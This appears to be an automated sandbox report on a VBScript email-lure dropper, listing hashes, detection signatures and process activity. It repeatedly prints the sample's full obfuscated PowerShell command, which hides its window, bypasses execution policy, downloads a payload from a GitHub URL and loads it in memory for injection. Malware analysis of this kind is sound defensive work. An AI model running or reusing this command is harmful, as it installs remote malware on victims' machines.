Windows Analysis Report
Nowe zam#U00f3wienie Roltop.vbs

Overview

General Information

Sample name: Nowe zam#U00f3wienie Roltop.vbs
renamed because original name is a hash value
Original sample name: Nowe zamwienie Roltop.vbs
Analysis ID: 1522478
MD5: 4f593177d0dc7f47a74a20f8d75dacfc
SHA1: ec4b127fabf32ce159ae4a093ea30e6f3a85d085
SHA256: c2110d453b7db8bcde1826f213136da46caec8dba656ccad721ad7cb066197f8
Tags: vbsuser-adam_zbadam
Infos:

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000001.00000002.1691192012.000002656C9B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1691493398.000002656CA0F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1691493398.000002656CA0F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb1 source: powershell.exe, 00000001.00000002.1690455662.000002656AB21000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1691778965.000002656CBD5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbl source: powershell.exe, 00000001.00000002.1691493398.000002656CA0F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb9 source: powershell.exe, 00000001.00000002.1690455662.000002656AB21000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Qib.pdbB source: powershell.exe, 00000001.00000002.1691493398.000002656CA0F000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: powershell.exe, 00000001.00000002.1687086787.000002650009D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1684912323.000001E73D447000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1687086787.0000026500057000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000001.00000002.1687086787.000002650006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1684912323.000001E73D47F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1684912323.000001E73D447000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1691192012.000002656C9B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.co

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 7492, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnSFpUJysndXJsID0gdHBhaCcrJ3R0cCcrJ3M6JysnLy9yYXcuZycrJ2l0aHVidScrJ3MnKydlcmNvJysnbnQnKydlbnQuJysnY29tJysnL05vRCcrJ2V0ZWN0JysnTycrJ24vTm8nKydEZScrJ3RlY3RPbi9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RoLScrJ1YudHh0dHAnKydhJysnOyBIJysnWicrJ1RiYScrJ3NlJysnNicrJzRDb24nKyd0ZW50ID0nKycgKE5ldy1PYicrJ2plY3QgJysnU3lzdGUnKydtJysnLk5ldC4nKydXZScrJ2JDbGllbnQnKycpLkRvd25sb2FkU3RyaW5nJysnKCcrJ0haVHVyJysnbCk7IEhaVGJpbmFyeUMnKydvbnRlbnQnKycgJysnPSAnKydbU3lzdGVtLicrJ0NvbnYnKydlJysncnQnKyddOicrJzpGcm9tJysnQicrJ2FzZTY0U3QnKydyaW4nKydnKEgnKydaVGJhc2U2JysnNENvbicrJ3RlbnQnKycpOyAnKydIWlRhc3NlbWJseSA9ICcrJ1snKydSZScrJ2YnKydsZWN0JysnaW9uLicrJ0FzJysnc2UnKydtYicrJ2x5XScrJzo6TG9hZChIWlRiJysnaW5hcnlDb24nKyd0ZScrJ24nKyd0KTsgW2RubGliLklPLkhvbWVdOjpWQUkoJysnNGRNMC9FJysnVDNQJysnTS9kL2VlLmV0JysncycrJ2FwLy8nKyc6cycrJ3B0dGg0JysnZE0sJysnIDRkTScrJ2Rlc2F0JysnaScrJ3ZhJysnZG80ZE0sIDRkTWRlcycrJ2F0aXZhJysnZG80JysnZE0nKycsJysnIDRkTWRlc2F0aXYnKydhJysnZG80JysnZE0nKycsIDRkTUFkZEknKyduJysnUCcrJ3JvY2UnKydzczMyNGRofficiosidadeCcrJyAnKyc0ZE0nKyc0JysnZE0nKycsNGRNJysnNGQnKydNKScpIC1yRVBMYUNlICdIWlQnLFtDSGFSXTM2ICAtckVQTGFDZSAnNGRNJyxbQ0hhUl0zNCAtY3JFUExhQ2UgJ3RwYScsW0NIYVJdMzkpfCAuICggJHBzSG9NRVsyMV0rJHBzaE9NRVszNF0rJ1gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnSFpUJysndXJsID0gdHBhaCcrJ3R0cCcrJ3M6JysnLy9yYXcuZycrJ2l0aHVidScrJ3MnKydlcmNvJysnbnQnKydlbnQuJysnY29tJysnL05vRCcrJ2V0ZWN0JysnTycrJ24vTm8nKydEZScrJ3RlY3RPbi9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RoLScrJ1YudHh0dHAnKydhJysnOyBIJysnWicrJ1RiYScrJ3NlJysnNicrJzRDb24nKyd0ZW50ID0nKycgKE5ldy1PYicrJ2plY3QgJysnU3lzdGUnKydtJysnLk5ldC4nKydXZScrJ2JDbGllbnQnKycpLkRvd25sb2FkU3RyaW5nJysnKCcrJ0haVHVyJysnbCk7IEhaVGJpbmFyeUMnKydvbnRlbnQnKycgJysnPSAnKydbU3lzdGVtLicrJ0NvbnYnKydlJysncnQnKyddOicrJzpGcm9tJysnQicrJ2FzZTY0U3QnKydyaW4nKydnKEgnKydaVGJhc2U2JysnNENvbicrJ3RlbnQnKycpOyAnKydIWlRhc3NlbWJseSA9ICcrJ1snKydSZScrJ2YnKydsZWN0JysnaW9uLicrJ0FzJysnc2UnKydtYicrJ2x5XScrJzo6TG9hZChIWlRiJysnaW5hcnlDb24nKyd0ZScrJ24nKyd0KTsgW2RubGliLklPLkhvbWVdOjpWQUkoJysnNGRNMC9FJysnVDNQJysnTS9kL2VlLmV0JysncycrJ2FwLy8nKyc6cycrJ3B0dGg0JysnZE0sJysnIDRkTScrJ2Rlc2F0JysnaScrJ3ZhJysnZG80ZE0sIDRkTWRlcycrJ2F0aXZhJysnZG80JysnZE0nKycsJysnIDRkTWRlc2F0aXYnKydhJysnZG80JysnZE0nKycsIDRkTUFkZEknKyduJysnUCcrJ3JvY2UnKydzczMyNGRofficiosidadeCcrJyAnKyc0ZE0nKyc0JysnZE0nKycsNGRNJysnNGQnKydNKScpIC1yRVBMYUNlICdIWlQnLFtDSGFSXTM2ICAtckVQTGFDZSAnNGRNJyxbQ0hhUl0zNCAtY3JFUExhQ2UgJ3RwYScsW0NIYVJdMzkpfCAuICggJHBzSG9NRVsyMV0rJHBzaE9NRVszNF0rJ1gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Java / VBScript file with very long strings (likely obfuscated code)
Source: Nowe zam#U00f3wienie Roltop.vbs Initial sample: Strings found which are bigger than 50
Yara signature match
Source: Process Memory Space: powershell.exe PID: 7492, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal92.expl.evad.winVBS@6/6@0/0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0nml5pgt.nzl.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Nowe zam#U00f3wienie Roltop.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Nowe zam#U00f3wienie Roltop.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnSFpUJysndXJsID0gdHBhaCcrJ3R0cCcrJ3M6JysnLy9yYXcuZycrJ2l0aHVidScrJ3MnKydlcmNvJysnbnQnKydlbnQuJysnY29tJysnL05vRCcrJ2V0ZWN0JysnTycrJ24vTm8nKydEZScrJ3RlY3RPbi9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RoLScrJ1YudHh0dHAnKydhJysnOyBIJysnWicrJ1RiYScrJ3NlJysnNicrJzRDb24nKyd0ZW50ID0nKycgKE5ldy1PYicrJ2plY3QgJysnU3lzdGUnKydtJysnLk5ldC4nKydXZScrJ2JDbGllbnQnKycpLkRvd25sb2FkU3RyaW5nJysnKCcrJ0haVHVyJysnbCk7IEhaVGJpbmFyeUMnKydvbnRlbnQnKycgJysnPSAnKydbU3lzdGVtLicrJ0NvbnYnKydlJysncnQnKyddOicrJzpGcm9tJysnQicrJ2FzZTY0U3QnKydyaW4nKydnKEgnKydaVGJhc2U2JysnNENvbicrJ3RlbnQnKycpOyAnKydIWlRhc3NlbWJseSA9ICcrJ1snKydSZScrJ2YnKydsZWN0JysnaW9uLicrJ0FzJysnc2UnKydtYicrJ2x5XScrJzo6TG9hZChIWlRiJysnaW5hcnlDb24nKyd0ZScrJ24nKyd0KTsgW2RubGliLklPLkhvbWVdOjpWQUkoJysnNGRNMC9FJysnVDNQJysnTS9kL2VlLmV0JysncycrJ2FwLy8nKyc6cycrJ3B0dGg0JysnZE0sJysnIDRkTScrJ2Rlc2F0JysnaScrJ3ZhJysnZG80ZE0sIDRkTWRlcycrJ2F0aXZhJysnZG80JysnZE0nKycsJysnIDRkTWRlc2F0aXYnKydhJysnZG80JysnZE0nKycsIDRkTUFkZEknKyduJysnUCcrJ3JvY2UnKydzczMyNGRofficiosidadeCcrJyAnKyc0ZE0nKyc0JysnZE0nKycsNGRNJysnNGQnKydNKScpIC1yRVBMYUNlICdIWlQnLFtDSGFSXTM2ICAtckVQTGFDZSAnNGRNJyxbQ0hhUl0zNCAtY3JFUExhQ2UgJ3RwYScsW0NIYVJdMzkpfCAuICggJHBzSG9NRVsyMV0rJHBzaE9NRVszNF0rJ1gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnSFpUJysndXJsID0gdHBhaCcrJ3R0cCcrJ3M6JysnLy9yYXcuZycrJ2l0aHVidScrJ3MnKydlcmNvJysnbnQnKydlbnQuJysnY29tJysnL05vRCcrJ2V0ZWN0JysnTycrJ24vTm8nKydEZScrJ3RlY3RPbi9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RoLScrJ1YudHh0dHAnKydhJysnOyBIJysnWicrJ1RiYScrJ3NlJysnNicrJzRDb24nKyd0ZW50ID0nKycgKE5ldy1PYicrJ2plY3QgJysnU3lzdGUnKydtJysnLk5ldC4nKydXZScrJ2JDbGllbnQnKycpLkRvd25sb2FkU3RyaW5nJysnKCcrJ0haVHVyJysnbCk7IEhaVGJpbmFyeUMnKydvbnRlbnQnKycgJysnPSAnKydbU3lzdGVtLicrJ0NvbnYnKydlJysncnQnKyddOicrJzpGcm9tJysnQicrJ2FzZTY0U3QnKydyaW4nKydnKEgnKydaVGJhc2U2JysnNENvbicrJ3RlbnQnKycpOyAnKydIWlRhc3NlbWJseSA9ICcrJ1snKydSZScrJ2YnKydsZWN0JysnaW9uLicrJ0FzJysnc2UnKydtYicrJ2x5XScrJzo6TG9hZChIWlRiJysnaW5hcnlDb24nKyd0ZScrJ24nKyd0KTsgW2RubGliLklPLkhvbWVdOjpWQUkoJysnNGRNMC9FJysnVDNQJysnTS9kL2VlLmV0JysncycrJ2FwLy8nKyc6cycrJ3B0dGg0JysnZE0sJysnIDRkTScrJ2Rlc2F0JysnaScrJ3ZhJysnZG80ZE0sIDRkTWRlcycrJ2F0aXZhJysnZG80JysnZE0nKycsJysnIDRkTWRlc2F0aXYnKydhJysnZG80JysnZE0nKycsIDRkTUFkZEknKyduJysnUCcrJ3JvY2UnKydzczMyNGRofficiosidadeCcrJyAnKyc0ZE0nKyc0JysnZE0nKycsNGRNJysnNGQnKydNKScpIC1yRVBMYUNlICdIWlQnLFtDSGFSXTM2ICAtckVQTGFDZSAnNGRNJyxbQ0hhUl0zNCAtY3JFUExhQ2UgJ3RwYScsW0NIYVJdMzkpfCAuICggJHBzSG9NRVsyMV0rJHBzaE9NRVszNF0rJ1gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000001.00000002.1691192012.000002656C9B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1691493398.000002656CA0F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1691493398.000002656CA0F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb1 source: powershell.exe, 00000001.00000002.1690455662.000002656AB21000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1691778965.000002656CBD5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbl source: powershell.exe, 00000001.00000002.1691493398.000002656CA0F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb9 source: powershell.exe, 00000001.00000002.1690455662.000002656AB21000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Qib.pdbB source: powershell.exe, 00000001.00000002.1691493398.000002656CA0F000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell -command $Codigo = 'KCgnSFpUJysndXJsID0gdHBhaCcrJ3R0cCcrJ3M6Jys", "0", "false");
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD if ($_.FullyQualifiedErrorId -ne "NativeCommandErro
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnSFpUJysndXJsID0gdHBhaCcrJ3R0cCcrJ3M6JysnLy9yYXcuZycrJ2l0aHVidScrJ3MnKydlcmNvJysnbnQnKydlbnQuJysnY29tJysnL05vRCcrJ2V0ZWN0JysnTycrJ24vTm8nKydEZScrJ3RlY3RPbi9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RoLScrJ1YudHh0dHAnKydhJysnOyBIJysnWicrJ1RiYScrJ3NlJysnNicrJzRDb24nKyd0ZW50ID0nKycgKE5ldy1PYicrJ2plY3QgJysnU3lzdGUnKydtJysnLk5ldC4nKydXZScrJ2JDbGllbnQnKycpLkRvd25sb2FkU3RyaW5nJysnKCcrJ0haVHVyJysnbCk7IEhaVGJpbmFyeUMnKydvbnRlbnQnKycgJysnPSAnKydbU3lzdGVtLicrJ0NvbnYnKydlJysncnQnKyddOicrJzpGcm9tJysnQicrJ2FzZTY0U3QnKydyaW4nKydnKEgnKydaVGJhc2U2JysnNENvbicrJ3RlbnQnKycpOyAnKydIWlRhc3NlbWJseSA9ICcrJ1snKydSZScrJ2YnKydsZWN0JysnaW9uLicrJ0FzJysnc2UnKydtYicrJ2x5XScrJzo6TG9hZChIWlRiJysnaW5hcnlDb24nKyd0ZScrJ24nKyd0KTsgW2RubGliLklPLkhvbWVdOjpWQUkoJysnNGRNMC9FJysnVDNQJysnTS9kL2VlLmV0JysncycrJ2FwLy8nKyc6cycrJ3B0dGg0JysnZE0sJysnIDRkTScrJ2Rlc2F0JysnaScrJ3ZhJysnZG80ZE0sIDRkTWRlcycrJ2F0aXZhJysnZG80JysnZE0nKycsJysnIDRkTWRlc2F0aXYnKydhJysnZG80JysnZE0nKycsIDRkTUFkZEknKyduJysnUCcrJ3JvY2UnKydzczMyNGRofficiosidadeCcrJyAnKyc0ZE0nKyc0JysnZE0nKycsNGRNJysnNGQnKydNKScpIC1yRVBMYUNlICdIWlQnLFtDSGFSXTM2ICAtckVQTGFDZSAnNGRNJyxbQ0hhUl0zNCAtY3JFUExhQ2UgJ3RwYScsW0NIYVJdMzkpfCAuICggJHBzSG9NRVsyMV0rJHBzaE9NRVszNF0rJ1gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
